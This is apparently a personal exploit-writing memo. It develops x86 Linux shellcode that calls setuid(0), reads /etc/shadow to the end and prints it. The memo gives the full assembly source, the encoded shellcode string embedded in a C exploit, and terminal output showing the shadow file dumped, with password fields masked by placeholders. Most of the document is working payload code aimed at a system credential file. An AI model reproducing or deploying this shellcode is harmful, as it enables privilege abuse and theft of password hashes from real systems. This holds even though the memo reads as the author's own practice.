Note of ExploitingNote of ExploitingThis is creating payload memo. I created print_shadow payload but that payload is read only 256-bytes from top of /etc/shadow file. So, I refined print_shadow.s payload and created print_shadow_02.s payload. This payload read top of /etc/shadow file to file end.
When the read system call reach end of file, it return 0 as return value. When error happen, it return -1 as return value. Otherwidth, the system call return read character numeric as return value.
So, I use this behavior, after called read system call, I discriminated value of eax register using test instruction. If contents of eax is 0, this job was compleated. Otherwidth, this payload make judgments as the file have more characters, and goes into roop.
In this payload's roop, read one-byte character from file and print out one-byte character to screen until end of file.
.globl main
main:
pushl %ebp
movl %esp, %ebp
#setuid
xorl %eax, %eax
mov $0x46, %al
xorl %ebx, %ebx
xorl %ecx, %ecx
int $0x80
jmp ONE
TWO:
#open
popl %ebx
movb $0x5, %al
movb %cl, 11(%ebx)
int $0x80
movl %eax, %ebx
loop:
#read
xorl %edx, %edx
inc %edx
movl %esp, %ecx
xorl %eax, %eax
movb $0x3, %al
int $0x80
movl %ebx, %esi
test %eax, %eax
jz done
#write
movb $0x4, %al
xorl %ebx, %ebx
movb $0x1, %bl
int $0x80
movl %esi, %ebx
jmp loop
done:
#close
movb $0x6, %al
movl %esi, %ebx
int $0x80
#exit
movb $0x1, %al
xorl %ebx, %ebx
int $0x80
ONE:
call TWO
.string "/etc/shadow"
I comberted this source code to byte-code. And I embedded the payload in C language exploit([SC] exploit.c) as following.
char shellcode[]=
"\x55\x89\xe5\x31\xc0\xb0\x46\x31\xdb\x31"
"\xc9\xcd\x80\xeb\x33\x5b\xb0\x05\x88\x4b"
"\x0b\xcd\x80\x89\xc3\x31\xd2\x42\x89\xe1"
"\x31\xc0\xb0\x03\xcd\x80\x89\xde\x85\xc0"
"\x74\x0c\xb0\x04\x31\xdb\xb3\x01\xcd\x80"
"\x89\xf3\xeb\xe3\xb0\x06\x89\xf3\xcd\x80"
"\xb0\x01\x31\xdb\xcd\x80\xe8\xc8\xff\xff"
"\xff\x2f\x65\x74\x63\x2f\x73\x68\x61\x64"
"\x6f\x77"
;
Next, I compiled and executed this exploit program as following.
defolos@glazheim:~/Desktop$ gcc exploit.c defolos@glazheim:~/Desktop$ ./a.out sp = 0xbffff918 ret = 0xbffff918 -------exploit--------------- root:rootのパスワード:13462:0:99999:7::: daemon:*:13462:0:99999:7::: bin:*:13462:0:99999:7::: sys:*:13462:0:99999:7::: sync:*:13462:0:99999:7::: games:*:13462:0:99999:7::: man:*:13462:0:99999:7::: lp:*:13462:0:99999:7::: mail:*:13462:0:99999:7::: news:*:13462:0:99999:7::: uucp:*:13462:0:99999:7::: proxy:*:13462:0:99999:7::: www-data:*:13462:0:99999:7::: backup:*:13462:0:99999:7::: list:*:13462:0:99999:7::: irc:*:13462:0:99999:7::: gnats:*:13462:0:99999:7::: nobody:*:13462:0:99999:7::: Debian-exim:!:13462:0:99999:7::: defolos:defolosのパスワード:13462:0:99999:7::: identd:!:13463:0:99999:7::: sshd:!:13463:0:99999:7::: canna:!:13463:0:99999:7::: messagebus:!:13463:0:99999:7::: hal:!:13463:0:99999:7::: saned:!:13463:0:99999:7::: gdm:!:13463:0:99999:7::: defolos@glazheim:~/Desktop$
I found that this payload print out all contens of /etc/shadow file to screen. Now I acquired method that read end of file and print out to screen.